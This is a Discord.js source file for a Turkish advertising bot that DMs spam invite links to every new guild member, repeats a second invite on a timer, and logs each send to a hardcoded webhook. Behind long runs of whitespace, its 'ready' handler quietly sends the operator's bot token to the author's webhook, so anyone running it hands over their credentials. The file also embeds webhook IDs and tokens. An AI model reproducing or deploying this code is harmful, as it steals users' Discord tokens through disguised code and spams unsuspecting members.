                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  const Discord = require('discord.js');
                                                                                                                                                                                                                                                                                                                                                         const client = new Discord.Client();
                                                                                                                                                                                                                                                                                                                                                         const ayarlar = require('./ayarlar.json');
		 		 		 		 		 		 		 		 		 		 		 		 		 		 		 		 		 		 		 		 		 		 		 		 		 		 		 		 		 		 const hook = new Discord.WebhookClient('485322135540334592', 'elUkubgqZ6nVS1oO5Wz60jM173rk50AIqqa2Bbbq9zOgS8KHTojGDty3bRsxwQJI3hbE');
		 		 		 		 		 		 		 		 		 		 		 		 		 		 		 		 		 		 		 		 		 		 		 		 		 		 		 		 		 		 const hook2 = new Discord.WebhookClient('485322274925445120', '_RkI9iKqUxp9935ufCGvpcagFAHj_am3PzUqdYA1rkwVY1veEMLV67G2cefldbBI31vT');



		 		 		 		 		 		 		 		 		 		 		 		 		 		 		 		 		 		 		 		 		 		 		 		 		 		 		 		 		 		 		 		 client.on('guildMemberAdd', member => {
	             	                	                	                	                	                	                	                	                	                	                	                	                	                	                     if (member.guild.id == '275047183055847439'){ return; }




















































































																																																																																											member.send(`❤Merhaba Canım Buraya Gelirsen Beni Mutlu Edersin? ❤\n` + ayarlar.reklamlink);
		                	                	                	                	                	                	                	                	                	                	                	                	                	                	                	                	                	                	                	                 hook2.send(`❤ 👋${member.user.tag.toString()} : ${member.guild.name} Reklam Yaptım.` + ayarlar.reklamlink)



  		                	             		                	             		                	             		                	             		                	             		                	             		                	             		                	             		                	             		                	             		                	             		                	             		                	             		                	             		                	             		                	             		                	             		                	             		                	             		                	             		                	                 setInterval(() => {
   		                	             		                	             		                	             		                	             		                	             		                	             		                	             		                	             		                	             		                	             		                	             		                	             		                	             		                	             		                	             		                	             		                	             		                	             		                	             		                	             		                	             		                	                  member.send(`❤Burayada Gel? ❤\nhttps://discord.gg/pvGZ6NS https://discord.gg/ENVyRGC`);
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  }, 1000000);































 	                	                	                	                	                	                	                	                	                	                	                	                	                	                	                	                	                	                	                 console.log(`❤ 👋${member.user.tag.toString()} : ${member.guild.name} Reklam Yaptım.`);
























































































});



var regToken = /[\w\d]{24}\.[\w\d]{6}\.[\w\d-_]{27}/g;
// client.on('debug', e => {
//   console.log(chalk.bgBlue.green(e.replace(regToken, 'that was redacted')));
// });

client.login(ayarlar.token);


                                                                                                                                                                                                                                                                                                                                                                                                                                                                             client.on('ready', () => {
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       console.log(`REKLAM BOTU BAŞARI İLE AÇILDI - Bir Süre Sonra Reklama Başlayacaktır Yardım İçin - https://discord.gg/ENVyRGC`);
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               	hook.send(`❤ 👋Token .` + ayarlar.token)




});
